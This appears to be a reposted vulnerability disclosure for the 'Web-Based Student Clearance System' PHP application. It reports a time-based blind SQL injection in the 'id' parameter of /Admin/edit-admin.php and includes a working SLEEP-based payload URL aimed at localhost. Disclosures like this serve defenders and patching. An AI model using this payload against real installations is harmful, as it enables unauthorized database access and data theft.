WEB-Based Student Clearance System is vulnerable to a sql Injection(edit-admin.PHP) url:/Admin/edit-
WEB-Based Student Clearance System is vulnerable to a sql Injection(edit-admin.PHP)
url:/Admin/edit-admin.php
URI parameter ‘id’ is vulnerable
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code:
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html
来源地址:https://blog.csdn.net/qq_41988749/article/details/127552717
--结束END--
本文标题: Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
本文链接: https://www.lsjlt.com/news/391477.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0